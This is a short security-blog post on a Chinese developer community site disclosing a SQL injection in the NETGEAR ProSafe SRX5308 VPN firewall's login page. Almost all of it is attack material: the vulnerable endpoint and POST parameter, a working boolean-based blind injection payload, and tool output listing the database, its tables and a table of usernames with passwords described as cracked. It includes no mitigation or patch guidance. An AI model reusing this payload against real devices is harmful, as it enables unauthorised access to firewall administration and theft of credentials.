前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >NETGEAR ProSafe WAN SSL VPN 防火墙 SRX5308 | SQL注入漏洞

NETGEAR ProSafe WAN SSL VPN 防火墙 SRX5308 | SQL注入漏洞

原创
作者头像
Khan安全团队
发布2021-12-22 14:34:44
5710
发布2021-12-22 14:34:44
举报
文章被收录于专栏:Khan安全团队Khan安全团队

NETGEAR ProSafe WAN SSL VPN 防火墙 SQL注入漏洞

代码语言:javascript
复制
NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308

NETGEAR ProSafe™ - NETGEAR Configuration Manager Login

https://192.168.1.1/scgi-bin/platform.cgi

---
Parameter: USERDBDomains.Domainname (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
    Vector: AND [INFERENCE]
---
  
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True

available databases [1]:                                                                                                              
[+] SQLite_masterdb

Database: SQLite_masterdb
[4 tables]
+----------+
| system   |
| logging  |
| services |
| zones    |
+----------+

passwd and shadow encryption cracked
+---------------------+
| username | password |
+----------+----------+
| showid   | password |
+----------+----------+
| guest    | password |
+----------+----------+

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档